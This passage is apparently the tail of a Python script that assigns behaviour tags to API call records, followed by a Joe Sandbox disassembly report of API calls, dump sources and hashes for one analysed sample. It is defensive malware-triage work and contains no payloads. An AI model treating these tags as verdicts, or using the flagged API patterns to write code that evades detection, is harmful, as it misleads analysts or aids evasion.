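    """Behaviour tags for one function's call list (sorted, de-duplicated)."""
    tags = set()
    names = {c.name for c in calls}
    msgs = []  # window-message numbers in call order, for sequence rules
    for c in calls:
        # A literal export name in GetProcAddress means the import is resolved
        # at run time: the name is a string in the binary, not an IAT entry.
        if c.name == "GetProcAddress" and len(c.args) >= 2 \
                and c.args[1] != "?" and _hex(c.args[1]) is None:
            tags.add(f"dynamic-import:{c.args[1]}")
        elif c.name == "OpenProcess" and c.args and _hex(c.args[0]) is not None:
            tags.add(f"open-process:{describe_access(_hex(c.args[0]))}")
        elif c.name in ("PostMessageW", "SendMessageW") and len(c.args) >= 2:
            msg = _hex(c.args[1])
            msgs.append(msg)
            if msg in WINDOW_MESSAGES:
                tags.add(f"window-message:{WINDOW_MESSAGES[msg]}")
    # Button-down followed by button-up posted to a window is a synthetic click.
    if 0x201 in msgs and 0x202 in msgs and msgs.index(0x201) < msgs.index(0x202):
        tags.add("synthetic-mouse-click")
    if {"RegConnectRegistryW", "RegEnumKeyExW"} <= names:
        tags.add("registry-enumeration:remote-capable")
    return sorted(tags)


# Constructed input: API lines copied from four entries above, keyed by the
# first call's ref address.
SAMPLE_RECORDS = {
    "006F633E": """\
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F633E
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F6350
• FreeLibrary.KERNEL32(00000000,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6362
""",
    "0077AD86": """\
• GetCurrentProcessId.KERNEL32 ref: 0077AD86
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0077AD94
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0077ADC7
• CloseHandle.KERNEL32(?), ref: 0077AF9C
""",
    "0077C404": """\
  • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C404
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C45F
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0077C4C2
• RegCloseKey.ADVAPI32(?,?), ref: 0077C505
""",
    "007521A5": """\
• GetWindowRect.USER32(?,?), ref: 007521A5
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00752251
• Sleep.KERNEL32(00000000,?,?,?), ref: 00752259
• PostMessageW.USER32(00000001,00000202,00000000), ref: 0075226A
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00752272
""",
}


def triage(records):
    """Map each record key to its behaviour tags."""
    return {key: tag_behaviours(parse_record(text)) for key, text in records.items()}


if __name__ == "__main__":
    for key, tags in triage(SAMPLE_RECORDS).items():
        print(key, ", ".join(tags) or "(no tags)")
```

                                        The tags describe what the code at those addresses is able to do, not what the sample was observed doing: registry enumeration, simulated clicks and self-inspection via GetProcessIoCounters are also ordinary helper routines in general-purpose scripting runtimes, so a tag is a pointer to an entry worth reading, not a verdict. Access mask 0x410 decodes to PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, which is what GetProcessIoCounters on the current process needs and nothing more.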
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007860A4
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 007860FC
                                        • _wcslen.LIBCMT ref: 0078610E
                                        • _wcslen.LIBCMT ref: 00786119
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00786175
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: d4897b404d2541f9288e8ad2d2232fdab2bd23a2edcdb18f67ba00aabe7252c2
                                        • Instruction ID: 0a32bf0bff344f64ef6a4d3e1b5b4b1c183ccca8d1b75a5284a6134f8b97d3d9
                                        • Opcode Fuzzy Hash: d4897b404d2541f9288e8ad2d2232fdab2bd23a2edcdb18f67ba00aabe7252c2
                                        • Instruction Fuzzy Hash: 6F217571940218ABDB21AF94CC88EDE77B8FB04364F108156F915DA1C5D77889858F60
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?,?,00750BEE), ref: 007508BB
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?), ref: 007508D6
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?), ref: 007508E4
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?), ref: 007508F4
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?), ref: 00750900
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 2afc2528135ebb59a99b1075aa02dc63fd1db835c4d9e2490c255340198fe3df
                                        • Instruction ID: 1c7f47570b7c5dd247edc5d2c7c2b004aa9685a931fa55aed479e4bfca42c646
                                        • Opcode Fuzzy Hash: 2afc2528135ebb59a99b1075aa02dc63fd1db835c4d9e2490c255340198fe3df
                                        • Instruction Fuzzy Hash: AC018F72600208AFDB205F64DC08FDA7BBDEB48762F248024FD05D2251E7B8ED049BE0
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760BE0
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760BED
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760BFA
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760C07
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760C14
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760C21
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 21fd71747e4ec717569572f23ba8fb3659f2b57ec2204fd5e44a280b16c989a7
                                        • Instruction ID: 61d6abc732985b772be163bd63fa5feb5a1263422ef1d5cd0f9ecacdc9086863
                                        • Opcode Fuzzy Hash: 21fd71747e4ec717569572f23ba8fb3659f2b57ec2204fd5e44a280b16c989a7
                                        • Instruction Fuzzy Hash: 2F01DCB1800B16CFCB30AF66D880803FBF9EF503093158A3ED09742921C7B5A888CF90
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 007564E7
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 007564FE
                                        • MessageBeep.USER32(00000000), ref: 00756516
                                        • KillTimer.USER32(?,0000040A), ref: 00756532
                                        • EndDialog.USER32(?,00000001), ref: 0075654C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: a77e9b85c65ab5c5cde917244a22a0102248b934566dd6f83767fc8eea63ee65
                                        • Instruction ID: f9dcf7214690cf963123bfe56788f04e3a4c487e970cdda62a3327f91a47a74b
                                        • Opcode Fuzzy Hash: a77e9b85c65ab5c5cde917244a22a0102248b934566dd6f83767fc8eea63ee65
                                        • Instruction Fuzzy Hash: D1018670680708ABEB305B10DD4EBD677B8BF10706F404569B587620E5FBF8AE58CB94
                                        APIs
                                        • _free.LIBCMT ref: 0072264E
                                          • Part of subcall function 00722D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0072DB71,007C1DC4,00000000,007C1DC4,00000000,?,0072DB98,007C1DC4,00000007,007C1DC4,?,0072DF95,007C1DC4), ref: 00722D6E
                                          • Part of subcall function 00722D58: GetLastError.KERNEL32(007C1DC4,?,0072DB71,007C1DC4,00000000,007C1DC4,00000000,?,0072DB98,007C1DC4,00000007,007C1DC4,?,0072DF95,007C1DC4,007C1DC4), ref: 00722D80
                                        • _free.LIBCMT ref: 00722660
                                        • _free.LIBCMT ref: 00722673
                                        • _free.LIBCMT ref: 00722684
                                        • _free.LIBCMT ref: 00722695
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 175c3ef8178a805d802522bd4bd1eb13fd8e7cd09ce5b913d94afa74d5c62485
                                        • Instruction ID: 2cbad591e5e224a673473ac807da706d8f186c81cc0d6583d8063d5b12207da8
                                        • Opcode Fuzzy Hash: 175c3ef8178a805d802522bd4bd1eb13fd8e7cd09ce5b913d94afa74d5c62485
                                        • Instruction Fuzzy Hash: 24F0DA71942230EB8711AF54BC09D483B64FF19752386C62EF41496277DB7D8963AF8C
                                        APIs
                                          • Part of subcall function 007105D2: EnterCriticalSection.KERNEL32(007C170C,?,00000000,?,006FD1DA,007C3540,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?), ref: 007105DD
                                          • Part of subcall function 007105D2: LeaveCriticalSection.KERNEL32(007C170C,?,006FD1DA,007C3540,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?,00000001,007C2430), ref: 0071061A
                                          • Part of subcall function 00710433: __onexit.LIBCMT ref: 00710439
                                        • __Init_thread_footer.LIBCMT ref: 00776B95
                                          • Part of subcall function 00710588: EnterCriticalSection.KERNEL32(007C170C,00000000,?,006FD208,007C3540,007327E9,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?), ref: 00710592
                                          • Part of subcall function 00710588: LeaveCriticalSection.KERNEL32(007C170C,?,006FD208,007C3540,007327E9,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?,00000001), ref: 007105C5
                                          • Part of subcall function 00763EF6: LoadStringW.USER32(00000066,?,00000FFF,0078DCEC), ref: 00763F3E
                                          • Part of subcall function 00763EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00763F64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                        • String ID: x3|$x3|$x3|
                                        • API String ID: 1072379062-2116605995
                                        • Opcode ID: b517f581639498827955f125324a81d44d2b7f65ec8a1e210635903a3201559e
                                        • Instruction ID: 9933b1f1364be57e2d17ed4f8c64293dd1987ff2b29a6f9aa3c2aea545bbe818
                                        • Opcode Fuzzy Hash: b517f581639498827955f125324a81d44d2b7f65ec8a1e210635903a3201559e
                                        • Instruction Fuzzy Hash: 29C18A75A00109EFCF14DF58C895EBAB7B9FF48340F148029E909AB295DB78AD45CBA0
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0075CAC6
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0075CB0C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007C2990,00D75C98), ref: 0075CB55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: 859615fd0efae533aad3cf80f25426407c6d397f6915e58b679285eff058eb5f
                                        • Instruction ID: 3bb9e52edf19fec99ea39cac96f14d085efa8f235074860705c6467c6df3d3c1
                                        • Opcode Fuzzy Hash: 859615fd0efae533aad3cf80f25426407c6d397f6915e58b679285eff058eb5f
                                        • Instruction Fuzzy Hash: 0841C3706053419FD721DF24C886F9ABBE5AF84321F10461DFD61972D1D7B8E908CBA2
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0078DCD0,00000000,?,?,?,?), ref: 00784E09
                                        • GetWindowLongW.USER32 ref: 00784E26
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00784E36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: cbf4a0e215dd766bb33a367d460eab6349a15d153fb3ef219b7156c781e0a8a6
                                        • Instruction ID: f44ce7840575cc00c0967d9378edf1a70ad94fa1468cd88a6b1354a87fc194c0
                                        • Opcode Fuzzy Hash: cbf4a0e215dd766bb33a367d460eab6349a15d153fb3ef219b7156c781e0a8a6
                                        • Instruction Fuzzy Hash: 2931813124020AAFDF61AF78CC45BEA77A9FB08334F204719F975921D0D7B8AC508760
                                        APIs
                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0078489F
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007848B3
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 007848D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: SysMonthCal32
                                        • API String ID: 2326795674-1439706946
                                        • Opcode ID: c92c5a8f808d3e115dc73cdf08ae874b0379245818bd5eafe09fc603079cbbe1
                                        • Instruction ID: 04d9338ef3961d6b831dd7cdd31c6b7c79858fef192aa2df9b80bb72d27d9470
                                        • Opcode Fuzzy Hash: c92c5a8f808d3e115dc73cdf08ae874b0379245818bd5eafe09fc603079cbbe1
                                        • Instruction Fuzzy Hash: A021A132640219AFEF259F90CC46FEA3BA9EF48724F110114FA156B1D0D6B9AC558BA0
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0078419F
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007841AF
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007841D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 4ec6a1cb39e9ff5468bb6fcb35df357fe4638b2e53a18f19c1f24eb15e919cea
                                        • Instruction ID: 6d0ba7c5470cecdfc299c942d080ea061151c38d407ce951492269e98900e1a8
                                        • Opcode Fuzzy Hash: 4ec6a1cb39e9ff5468bb6fcb35df357fe4638b2e53a18f19c1f24eb15e919cea
                                        • Instruction Fuzzy Hash: 3221C53265021DBBEF219F54DC48FFB376EEF99754F108114F9049B190C6B99C9287A0
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00784BAE
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00784BC3
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00784BD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: ec1e9445e0daa7be5da014bd55b694916f0949ce1c36a008016789b952d5f691
                                        • Instruction ID: 3f5db2e2f2f13ca3257f2a59de8f14646891f95414c5b09ded06ca388d5e8084
                                        • Opcode Fuzzy Hash: ec1e9445e0daa7be5da014bd55b694916f0949ce1c36a008016789b952d5f691
                                        • Instruction Fuzzy Hash: FE110A71280209BEEF116F65CC06FA77BACEF85714F114515FA55E2090D6B5DC11C714
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00786220
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0078624D
                                        • DrawMenuBar.USER32(?), ref: 0078625C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: 15bb81d29a6ac94b0c4254c0d6e7b7b26abd6de5991932a8324e487f7caeadcb
                                        • Instruction ID: e3891c8683f7d12559834d96a8bc631966dd348a86ef47660d8da8672cc2990c
                                        • Opcode Fuzzy Hash: 15bb81d29a6ac94b0c4254c0d6e7b7b26abd6de5991932a8324e487f7caeadcb
                                        • Instruction Fuzzy Hash: 52016931640218EFDB20AF55DC88BAE7BB5FF44751F14809AF849D6190DB7889A4EF21
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c1e12c6faaa68ac332b16d74e5ff2dfc5df51711bfe332ce3e76f19566d744b
                                        • Instruction ID: a71b8b384c6f0cf2f1cbc1335aecd43a467298d4cf6e51c441f73995633268f4
                                        • Opcode Fuzzy Hash: 9c1e12c6faaa68ac332b16d74e5ff2dfc5df51711bfe332ce3e76f19566d744b
                                        • Instruction Fuzzy Hash: 99C17B75A0020AEFDB14CFA4C894EEAB7B5FF48315F208598E805EB251D775EE85CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                        • Instruction ID: b787896db102961d196c1471d77575802acf04ff7b89605ed4c476d99dd7f97f
                                        • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                        • Instruction Fuzzy Hash: 95A16A72A007E6DFEB25DF58E891BAEBBE4EF15310F28416DE5859B282D23C8D41C750
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750E80
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750E98
                                        • CLSIDFromProgID.OLE32(?,?,00000000,0078DCE0,000000FF,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750EBD
                                        • _memcmp.LIBVCRUNTIME ref: 00750EDE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0077245A
                                        • WSAGetLastError.WSOCK32 ref: 00772468
